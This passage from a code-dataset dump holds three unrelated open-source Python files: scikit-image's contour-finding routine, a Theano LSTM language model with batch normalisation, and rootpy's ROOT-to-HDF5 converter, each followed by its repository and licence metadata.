The order of the contours in the output list is determined by the position
of the smallest ``x,y`` (in lexicographical order) coordinate in the
contour. This is a side-effect of how the input array is traversed, but
can be relied upon.
.. warning::
Array coordinates/values are assumed to refer to the *center* of the
array element. Take a simple example input: ``[0, 1]``. The interpolated
position of 0.5 in this array is midway between the 0-element (at
``x=0``) and the 1-element (at ``x=1``), and thus would fall at
``x=0.5``.
This means that to find reasonable contours, it is best to find contours
midway between the expected "light" and "dark" values. In particular,
given a binarized array, *do not* choose to find contours at the low or
high value of the array. This will often yield degenerate contours,
especially around structures that are a single array element wide. Instead
choose a middle value, as above.
References
----------
.. [1] Lorensen, William and Harvey E. Cline. Marching Cubes: A High
Resolution 3D Surface Construction Algorithm. Computer Graphics
(SIGGRAPH 87 Proceedings) 21(4) July 1987, p. 163-170).
Examples
--------
>>> a = np.zeros((3, 3))
>>> a[0, 0] = 1
>>> a
array([[ 1., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]])
>>> find_contours(a, 0.5)
[array([[ 0. , 0.5],
[ 0.5, 0. ]])]
"""
array = np.asarray(array, dtype=np.double)
if array.ndim != 2:
raise ValueError('Only 2D arrays are supported.')
level = float(level)
if (fully_connected not in _param_options or
positive_orientation not in _param_options):
raise ValueError('Parameters "fully_connected" and'
' "positive_orientation" must be either "high" or "low".')
point_list = _find_contours_cy.iterate_and_store(array, level,
fully_connected == 'high')
contours = _assemble_contours(_take_2(point_list))
if positive_orientation == 'high':
contours = [c[::-1] for c in contours]
return contours
def _take_2(seq):
iterator = iter(seq)
while(True):
n1 = next(iterator)
n2 = next(iterator)
yield (n1, n2)
def _assemble_contours(points_iterator):
current_index = 0
contours = {}
starts = {}
ends = {}
for from_point, to_point in points_iterator:
# Ignore degenerate segments.
# This happens when (and only when) one vertex of the square is
# exactly the contour level, and the rest are above or below.
# This degnerate vertex will be picked up later by neighboring squares.
if from_point == to_point:
continue
tail_data = starts.get(to_point)
head_data = ends.get(from_point)
if tail_data is not None and head_data is not None:
tail, tail_num = tail_data
head, head_num = head_data
# We need to connect these two contours.
if tail is head:
# We need to closed a contour.
# Add the end point, and remove the contour from the
# 'starts' and 'ends' dicts.
head.append(to_point)
del starts[to_point]
del ends[from_point]
else: # tail is not head
# We need to join two distinct contours.
# We want to keep the first contour segment created, so that
# the final contours are ordered left->right, top->bottom.
if tail_num > head_num:
# tail was created second. Append tail to head.
head.extend(tail)
# remove all traces of tail:
del starts[to_point]
try:
del ends[tail[-1]]
except KeyError:
pass
del contours[tail_num]
# remove the old end of head and add the new end.
del ends[from_point]
ends[head[-1]] = (head, head_num)
else: # tail_num <= head_num
# head was created second. Prepend head to tail.
tail.extendleft(reversed(head))
# remove all traces of head:
del starts[head[0]]
del ends[from_point]
del contours[head_num]
# remove the old start of tail and add the new start.
del starts[to_point]
starts[tail[0]] = (tail, tail_num)
elif tail_data is None and head_data is None:
# we need to add a new contour
current_index += 1
new_num = current_index
new_contour = deque((from_point, to_point))
contours[new_num] = new_contour
starts[from_point] = (new_contour, new_num)
ends[to_point] = (new_contour, new_num)
elif tail_data is not None and head_data is None:
tail, tail_num = tail_data
# We've found a single contour to which the new segment should be
# prepended.
tail.appendleft(from_point)
del starts[to_point]
starts[from_point] = (tail, tail_num)
elif tail_data is None and head_data is not None:
head, head_num = head_data
# We've found a single contour to which the new segment should be
# appended
head.append(to_point)
del ends[from_point]
ends[to_point] = (head, head_num)
# end iteration over from_ and to_ points
return [np.array(contour) for (num, contour) in sorted(contours.items())]
| bsd-3-clause |
bittlingmayer/Theano-Lights | models/lm_lstm_bn.py | 11 | 5709 | import theano
import theano.tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.tensor.nnet.conv import conv2d
from theano.tensor.signal.downsample import max_pool_2d
from theano.tensor.shared_randomstreams import RandomStreams
import numpy as np
from toolbox import *
from modelbase import *
class LM_lstm_bn(ModelLMBase):
def save(self):
if not os.path.exists('savedmodels\\'):
os.makedirs('savedmodels\\')
self.params.save(self.filename)
self.shared_vars.save(self.filename + '_vars')
def __init__(self, data, hp):
super(LM_lstm_bn, self).__init__(self.__class__.__name__, data, hp)
self.n_h = 1024
self.dropout = 0.5
self.params = Parameters()
self.hiddenstates = Parameters()
self.shared_vars = Parameters()
n_tokens = self.data['n_tokens']
gates = 4
self.epsilon = 0.001
with self.hiddenstates:
b1_h = shared_zeros((self.hp.batch_size, self.n_h))
b1_c = shared_zeros((self.hp.batch_size, self.n_h))
b2_h = shared_zeros((self.hp.batch_size, self.n_h))
b2_c = shared_zeros((self.hp.batch_size, self.n_h))
if hp.load_model and os.path.isfile(self.filename):
self.params.load(self.filename)
self.shared_vars.load(self.filename + '_vars')
else:
with self.params:
W_emb = shared_normal((n_tokens, self.n_h), scale=hp.init_scale)
#W_o = shared_normal((n_h, n_tokens), scale=scale)
W1 = shared_normal((self.n_h, self.n_h*gates), scale=hp.init_scale*1.5)
V1 = shared_normal((self.n_h, self.n_h*gates), scale=hp.init_scale*1.5)
b1 = shared_zeros((self.n_h*gates,))
gamma = shared_uniform((self.n_h*gates,), range=[0.95, 1.05])
beta = shared_zeros((self.n_h*gates,))
W2 = shared_normal((self.n_h, self.n_h*gates), scale=hp.init_scale*1.5)
V2 = shared_normal((self.n_h, self.n_h*gates), scale=hp.init_scale*1.5)
b2 = shared_zeros((self.n_h*gates,))
with self.shared_vars:
m_shared = shared_zeros((1, self.n_h*gates), broadcastable=(True, False))
v_shared = shared_zeros((1, self.n_h*gates), broadcastable=(True, False))
def lstm(X, h, c, W, U, b):
g_on = T.dot(X,W) + T.dot(h,U) + b
i_on = T.nnet.sigmoid(g_on[:,:self.n_h])
f_on = T.nnet.sigmoid(g_on[:,self.n_h:2*self.n_h])
o_on = T.nnet.sigmoid(g_on[:,2*self.n_h:3*self.n_h])
c = f_on * c + i_on * T.tanh(g_on[:,3*self.n_h:])
h = o_on * T.tanh(c)
return h, c
def batch_norm(X, gamma, beta, m_shared, v_shared, test, add_updates):
if X.ndim > 2:
output_shape = X.shape
X = X.flatten(2)
if test is False:
m = T.mean(X, axis=0, keepdims=True)
v = T.sqrt(T.var(X, axis=0, keepdims=True) + self.epsilon)
mulfac = 1.0/1000
if m_shared in add_updates:
add_updates[m_shared] = (1.0-mulfac)*add_updates[m_shared] + mulfac*m
add_updates[v_shared] = (1.0-mulfac)*add_updates[v_shared] + mulfac*v
else:
add_updates[m_shared] = (1.0-mulfac)*m_shared + mulfac*m
add_updates[v_shared] = (1.0-mulfac)*v_shared + mulfac*v
else:
m = m_shared
v = v_shared
X_hat = (X - m) / v
y = gamma*X_hat + beta
if X.ndim > 2:
y = T.reshape(y, output_shape)
return y
def lstm_bn(X, h, c, W, U, b, gamma, beta, m, v, test, add_updates):
g_on = batch_norm(T.dot(X,W) + T.dot(h,U) + b, gamma, beta, m, v, test, add_updates)
i_on = T.nnet.sigmoid(g_on[:,:self.n_h])
f_on = T.nnet.sigmoid(g_on[:,self.n_h:2*self.n_h])
o_on = T.nnet.sigmoid(g_on[:,2*self.n_h:3*self.n_h])
c = f_on * c + i_on * T.tanh(g_on[:,3*self.n_h:])
h = o_on * T.tanh(c)
return h, c
def model(x, p, sv, test, add_updates, p_dropout):
h0 = p.W_emb[x] # (seq_len, batch_size, emb_size)
h0 = dropout(h0, p_dropout)
cost, h1, c1, h2, c2 = [0., b1_h, b1_c, b2_h, b2_c]
for t in xrange(0, self.hp.seq_size):
if t >= self.hp.warmup_size:
pyx = softmax(T.dot(h2, T.transpose(p.W_emb)))
cost += T.sum(T.nnet.categorical_crossentropy(pyx, theano_one_hot(x[t], n_tokens)))
h1, c1 = lstm_bn(h0[t], h1, c1, p.W1, p.V1, p.b1, p.gamma, p.beta, sv.m_shared, sv.v_shared, test, add_updates)
h1 = dropout(h1, p_dropout)
h2, c2 = lstm(h1, h2, c2, p.W2, p.V2, p.b2)
h2 = dropout(h2, p_dropout)
h_updates = [(b1_h, h1), (b1_c, c1), (b2_h, h2), (b2_c, c2)]
return cost, h_updates
add_updates = {}
cost, h_updates = model(self.X, self.params, self.shared_vars, False, add_updates, self.dropout)
te_cost, te_h_updates = model(self.X, self.params, self.shared_vars, True, None, 0.0)
add_updates_list = []
for key, value in add_updates.iteritems():
add_updates_list.append((key, value))
self.compile(cost, te_cost, h_updates, te_h_updates, add_updates_list)
| mit |
kreczko/rootpy | rootpy/root2hdf5.py | 1 | 16375 | # Copyright 2012 the rootpy developers
# distributed under the terms of the GNU General Public License
"""
This module handles conversion of ROOT's TFile and
contained TTrees into HDF5 format with PyTables
"""
from __future__ import absolute_import
import os
import sys
import warnings
from pkg_resources import parse_version
import tables
TABLES_NEW_API = parse_version(tables.__version__) >= parse_version('3')
if TABLES_NEW_API:
tables_open = tables.open_file
else:
tables_open = tables.openFile
from root_numpy import tree2array, RootNumpyUnconvertibleWarning
from numpy.lib import recfunctions
from .io import root_open, TemporaryFile
from . import log; log = log[__name__]
from .extern.progressbar import ProgressBar, Bar, ETA, Percentage
from .extern.six import string_types
from .logger.utils import check_tty
from . import QROOT
__all__ = [
'tree2hdf5',
'root2hdf5',
]
def _drop_object_col(rec, warn=True):
# ignore columns of type `object` since PyTables does not support these
if rec.dtype.hasobject:
object_fields = []
fields = rec.dtype.fields
for name in rec.dtype.names:
if fields[name][0].kind == 'O':
object_fields.append(name)
if warn:
log.warning(
"ignoring unsupported object branch '{0}'".format(
name))
# NumPy 1.7.1: TypeError: Cannot change data-type for object array.
#return rec[non_object_fields]
if object_fields:
rec = recfunctions.rec_drop_fields(rec, object_fields)
return rec
def tree2hdf5(tree, hfile, group=None,
entries=-1, selection=None,
show_progress=False):
"""
Convert a TTree into a HDF5 table.
Parameters
----------
tree : ROOT.TTree
A ROOT TTree.
hfile : string or PyTables HDF5 File
A PyTables HDF5 File handle or string path to an existing HDF5 file.
group : string or PyTables Group instance, optional (default=None)
Write the table at this location in the HDF5 file.
entries : int, optional (default=-1)
The number of entries to read at once while converting a ROOT TTree
into an HDF5 table. By default read the entire TTree into memory (this
may not be desired if your TTrees are large).
selection : string, optional (default=None)
A ROOT selection expression to be applied on the TTree before
conversion.
show_progress : bool, optional (default=False)
If True, then display and update a progress bar on stdout as the TTree
is converted.
"""
show_progress = show_progress and check_tty(sys.stdout)
if show_progress:
widgets = [Percentage(), ' ', Bar(), ' ', ETA()]
own_h5file = False
if isinstance(hfile, string_types):
hfile = tables_open(filename=hfile, mode="w", title="Data")
own_h5file = True
log.info("Converting tree '{0}' with {1:d} entries ...".format(
tree.GetName(),
tree.GetEntries()))
if not group:
group = hfile.root
elif isinstance(group, string_types):
group_where = '/' + os.path.dirname(group)
group_name = os.path.basename(group)
if TABLES_NEW_API:
group = hfile.create_group(group_where, group_name,
createparents=True)
else:
group = hfile.createGroup(group_where, group_name)
if tree.GetName() in group:
log.warning(
"Tree '{0}' already exists "
"in the output file".format(tree.GetName()))
return
total_entries = tree.GetEntries()
pbar = None
if show_progress and total_entries > 0:
pbar = ProgressBar(widgets=widgets, maxval=total_entries)
if entries <= 0:
# read the entire tree
if pbar is not None:
pbar.start()
array = tree2array(tree, selection=selection)
array = _drop_object_col(array)
if TABLES_NEW_API:
table = hfile.create_table(
group, tree.GetName(),
array, tree.GetTitle())
else:
table = hfile.createTable(
group, tree.GetName(),
array, tree.GetTitle())
# flush data in the table
table.flush()
# flush all pending data
hfile.flush()
else:
# read the tree in chunks
start = 0
while start < total_entries or start == 0:
if start > 0:
with warnings.catch_warnings():
warnings.simplefilter(
"ignore",
RootNumpyUnconvertibleWarning)
warnings.simplefilter(
"ignore",
tables.NaturalNameWarning)
array = tree2array(
tree,
selection=selection,
start=start,
stop=start + entries)
array = _drop_object_col(array, warn=False)
table.append(array)
else:
array = tree2array(
tree,
selection=selection,
start=start,
stop=start + entries)
array = _drop_object_col(array)
if pbar is not None:
# start after any output from root_numpy
pbar.start()
if TABLES_NEW_API:
table = hfile.create_table(
group, tree.GetName(),
array, tree.GetTitle())
else:
table = hfile.createTable(
group, tree.GetName(),
array, tree.GetTitle())
start += entries
if start <= total_entries and pbar is not None:
pbar.update(start)
# flush data in the table
table.flush()
# flush all pending data
hfile.flush()
if pbar is not None:
pbar.finish()
if own_h5file:
hfile.close()
def root2hdf5(rfile, hfile, rpath='',
entries=-1, userfunc=None,
selection=None,
show_progress=False,
ignore_exception=False):
"""
Convert all trees in a ROOT file into tables in an HDF5 file.
Parameters
----------
rfile : string or asrootpy'd ROOT File
A ROOT File handle or string path to an existing ROOT file.
hfile : string or PyTables HDF5 File
A PyTables HDF5 File handle or string path to an existing HDF5 file.
rpath : string, optional (default='')
Top level path to begin traversal through the ROOT file. By default
convert everything in and below the root directory.
entries : int, optional (default=-1)
The number of entries to read at once while converting a ROOT TTree
into an HDF5 table. By default read the entire TTree into memory (this
may not be desired if your TTrees are large).
userfunc : callable, optional (default=None)
A function that will be called on every tree and that must return a
tree or list of trees that will be converted instead of the original
tree.
selection : string, optional (default=None)
A ROOT selection expression to be applied on all trees before
conversion.
show_progress : bool, optional (default=False)
If True, then display and update a progress bar on stdout as each tree
is converted.
ignore_exception : bool, optional (default=False)
If True, then ignore exceptions raised in converting trees and instead
skip such trees.
"""
own_rootfile = False
if isinstance(rfile, string_types):
rfile = root_open(rfile)
own_rootfile = True
own_h5file = False
if isinstance(hfile, string_types):
hfile = tables_open(filename=hfile, mode="w", title="Data")
own_h5file = True
for dirpath, dirnames, treenames in rfile.walk(
rpath, class_ref=QROOT.TTree):
# skip directories w/o trees
if not treenames:
continue
treenames.sort()
group_where = '/' + os.path.dirname(dirpath)
group_name = os.path.basename(dirpath)
if not group_name:
group = hfile.root
elif TABLES_NEW_API:
group = hfile.create_group(group_where, group_name,
createparents=True)
else:
group = hfile.createGroup(group_where, group_name)
ntrees = len(treenames)
log.info(
"Will convert {0:d} tree{1} in {2}".format(
ntrees, 's' if ntrees != 1 else '',
os.path.join(group_where, group_name)))
for treename in treenames:
input_tree = rfile.Get(os.path.join(dirpath, treename))
if userfunc is not None:
tmp_file = TemporaryFile()
# call user-defined function on tree and get output trees
log.info("Calling user function on tree '{0}'".format(
input_tree.GetName()))
trees = userfunc(input_tree)
if not isinstance(trees, list):
trees = [trees]
else:
trees = [input_tree]
tmp_file = None
for tree in trees:
try:
tree2hdf5(tree, hfile, group=group,
entries=entries, selection=selection,
show_progress=show_progress)
except Exception as e:
if ignore_exception:
log.error("Failed to convert tree '{0}': {1}".format(
tree.GetName(), str(e)))
else:
raise
input_tree.Delete()
if userfunc is not None:
for tree in trees:
tree.Delete()
tmp_file.Close()
if own_h5file:
hfile.close()
if own_rootfile:
rfile.Close()
def main():
import rootpy
from rootpy.extern.argparse import (
ArgumentParser,
ArgumentDefaultsHelpFormatter, RawTextHelpFormatter)
class formatter_class(ArgumentDefaultsHelpFormatter,
RawTextHelpFormatter):
pass
parser = ArgumentParser(formatter_class=formatter_class,
description="Convert ROOT files containing TTrees into HDF5 files "
"containing HDF5 tables")
parser.add_argument('--version', action='version',
version=rootpy.__version__,
help="show the version number and exit")
parser.add_argument('-n', '--entries', type=int, default=100000,
help="number of entries to read at once")
parser.add_argument('-f', '--force', action='store_true', default=False,
help="overwrite existing output files")
parser.add_argument('-u', '--update', action='store_true', default=False,
help="update existing output files")
parser.add_argument('--ext', default='h5',
help="output file extension")
parser.add_argument('-c', '--complevel', type=int, default=5,
choices=range(0, 10),
help="compression level")
parser.add_argument('-l', '--complib', default='zlib',
choices=('zlib', 'lzo', 'bzip2', 'blosc'),
help="compression algorithm")
parser.add_argument('-s', '--selection', default=None,
help="apply a selection on each "
"tree with a cut expression")
parser.add_argument(
'--script', default=None,
help="Python script containing a function with the same name \n"
"that will be called on each tree and must return a tree or \n"
"list of trees that will be converted instead of the \n"
"original tree")
parser.add_argument('-q', '--quiet', action='store_true', default=False,
help="suppress all warnings")
parser.add_argument('-d', '--debug', action='store_true', default=False,
help="show stack trace in the event of "
"an uncaught exception")
parser.add_argument('--no-progress-bar', action='store_true', default=False,
help="do not show the progress bar")
parser.add_argument('--ignore-exception', action='store_true',
default=False,
help="ignore exceptions raised in converting trees "
"and instead skip such trees")
parser.add_argument('files', nargs='+')
args = parser.parse_args()
rootpy.log.basic_config_colorized()
import logging
if hasattr(logging, 'captureWarnings'):
logging.captureWarnings(True)
def formatwarning(message, category, filename, lineno, line=None):
return "{0}: {1}".format(category.__name__, message)
warnings.formatwarning = formatwarning
args.ext = args.ext.strip('.')
if args.quiet:
warnings.simplefilter(
"ignore",
RootNumpyUnconvertibleWarning)
warnings.simplefilter(
"ignore",
tables.NaturalNameWarning)
userfunc = None
if args.script is not None:
# get user-defined function
try:
exec(compile(open(args.script).read(), args.script, 'exec'),
globals(), locals())
except IOError:
sys.exit('Could not open script {0}'.format(args.script))
funcname = os.path.splitext(os.path.basename(args.script))[0]
try:
userfunc = locals()[funcname]
except KeyError:
sys.exit(
"Could not find the function '{0}' in the script {1}".format(
funcname, args.script))
for inputname in args.files:
outputname = os.path.splitext(inputname)[0] + '.' + args.ext
output_exists = os.path.exists(outputname)
if output_exists and not (args.force or args.update):
sys.exit(
"Output {0} already exists. "
"Use the --force option to overwrite it".format(outputname))
try:
rootfile = root_open(inputname)
except IOError:
sys.exit("Could not open {0}".format(inputname))
try:
if args.complevel > 0:
filters = tables.Filters(complib=args.complib,
complevel=args.complevel)
else:
filters = None
hd5file = tables_open(filename=outputname,
mode='a' if args.update else 'w',
title='Data', filters=filters)
except IOError:
sys.exit("Could not create {0}".format(outputname))
try:
log.info("Converting {0} ...".format(inputname))
root2hdf5(rootfile, hd5file,
entries=args.entries,
userfunc=userfunc,
selection=args.selection,
show_progress=not args.no_progress_bar,
ignore_exception=args.ignore_exception)
log.info("{0} {1}".format(
"Updated" if output_exists and args.update else "Created",
outputname))
except KeyboardInterrupt:
log.info("Caught Ctrl-c ... cleaning up")
hd5file.close()
rootfile.Close()
if not output_exists:
log.info("Removing {0}".format(outputname))
os.unlink(outputname)
sys.exit(1)
except Exception as e:
if args.debug:
# If in debug mode show full stack trace
import traceback
traceback.print_exception(*sys.exc_info())
log.error(str(e))
sys.exit(1)
finally:
hd5file.close()
rootfile.Close()
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.